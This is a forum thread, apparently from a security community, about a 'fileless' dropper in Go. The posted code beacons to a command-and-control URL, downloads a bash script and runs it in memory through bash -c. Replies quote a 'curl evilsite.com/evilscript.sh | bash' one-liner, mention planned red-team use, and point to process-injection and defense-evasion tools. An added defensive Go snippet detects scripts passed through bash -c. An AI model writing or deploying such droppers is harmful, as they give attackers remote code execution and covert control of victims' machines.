[GoLang] Executing fileless scripts

Hi folks!

Some days ago I was wondering about some new idea to code in Go, and I had this idea: something similar to PowerShell “DownloadString” but for the Linux environment!

It's very simple: the code reads your shell script body from your C&C, keeps it in memory (within a variable), then executes it directly in bash.
I didn’t test it deeply; I did some basic tests, and it worked.

package main

import (
    "io/ioutil"
    "net/http"
    "os/exec"
    "time"
)

func main() {
    for {
        url := "http://my_command_control:8080/executeThisScript" // Download your bash script
        resp, _ := http.Get(string(url))
        defer resp.Body.Close()

        shellScriptBody, _ := ioutil.ReadAll(resp.Body) // keep in memory

        cmd := exec.Command("/bin/bash", "-c", string(shellScriptBody))
        cmd.Start()                                                     // run in background

        time.Sleep(5000) // wait for the next beaconing
    }
}

Example of dumb shell to PoC:

#!/bin/bash

if [ ! -d /tmp/testDir ]; then
mkdir /tmp/testDir
fi

cd /tmp/testDir
touch test.sh
ifconfig > ifconfig.log
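Added example, not part of the original post: because the script body is handed to bash as its `-c` argument, it never touches disk but it is readable in `/proc/<pid>/cmdline` (and in any execve audit record) for as long as the shell runs. The Go check below flags that pattern; the function names, the sample cmdlines and the 3-newline threshold are assumptions made for illustration.

```go
package main

import (
	"bytes"
	"fmt"
	"path/filepath"
	"strings"
)

var shells = map[string]bool{"sh": true, "bash": true, "dash": true, "zsh": true}

// isDashC matches "-c" and bundled short options such as "-ec".
func isDashC(a string) bool {
	return strings.HasPrefix(a, "-") && !strings.HasPrefix(a, "--") && strings.HasSuffix(a, "c")
}

// inspectCmdline takes the raw bytes of /proc/<pid>/cmdline (NUL-separated
// argv) and returns a reason if a shell got a whole script as its -c argument.
func inspectCmdline(raw []byte) (string, bool) {
	argv := strings.Split(string(bytes.TrimRight(raw, "\x00")), "\x00")
	if len(argv) < 3 || !shells[filepath.Base(argv[0])] {
		return "", false
	}
	for i := 1; i < len(argv)-1; i++ {
		if !isDashC(argv[i]) {
			continue
		}
		script := strings.TrimSpace(argv[i+1])
		if strings.HasPrefix(script, "#!") {
			return "shebang inside -c argument", true
		}
		// Assumed heuristic: interactive one-liners rarely span 4+ lines.
		if n := strings.Count(script, "\n"); n >= 3 {
			return fmt.Sprintf("%d-line script inside -c argument", n+1), true
		}
	}
	return "", false
}

func main() {
	// Constructed samples; the first mirrors the PoC script from the post.
	for _, raw := range []string{
		"/bin/bash\x00-c\x00#!/bin/bash\n\ncd /tmp/testDir\nifconfig > ifconfig.log\n\x00",
		"bash\x00-c\x00ls /tmp\x00",
	} {
		reason, hit := inspectCmdline([]byte(raw))
		fmt.Println(hit, reason)
	}
}
```

On a live host the same function can be fed the contents of each `/proc/<pid>/cmdline`; pairing a hit with the parent process's executable path helps separate build tools and CI runners from unexpected callers.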

Well, it’s quite similar to executing a system command with “@system(‘cmd’)” in PHP. It fits for Windows and Linux OS. :sweat_smile:

Yeah, it's just a way to execute it in Go.
Unlike PHP, Go can be compiled into an ELF file; PHP can't be compiled to ELF.
But what I coded can be done in PHP also.

I think it's a simple dropper

I’ve been seeing more malware samples written in Go, this post is making me think I need to check it out!


See also fileless-xec for a dropper in golang.

  • Does not write binary in memory
  • Supports HTTP3, ICMP, ~Cross-platform
  • Server and client mode

The difference is that it executes binary instead of shell command. But there is a hacky workaround (see

I don’t mean to bash (pun not intended), but how is this better/different than a simple: curl evilsite.com/evilscript.sh | bash ?

Nice, I think I’ll make good use of this in a red team sometime.


Well, you can also inject to any other process and your payload will be used as a legitimate process.

This is the project: GitHub - Jhangju/goLang-injectors: This project will guide yout to awareness of injection in almost every window API and process.
This guy gives a demo and experiment: The art of defense evasion -part-2 — Endpoint evasion | by Osama Ellahi | Mar, 2022 | Medium

I had talked to a Go evasion tool developer; he had mentioned Golang provides its own syscalls. If anyone knows / can clarify on that I would greatly appreciate it.
An interesting link down that rabbit hole - golang.org/x/sys


Yes, it is correct. We also used it.
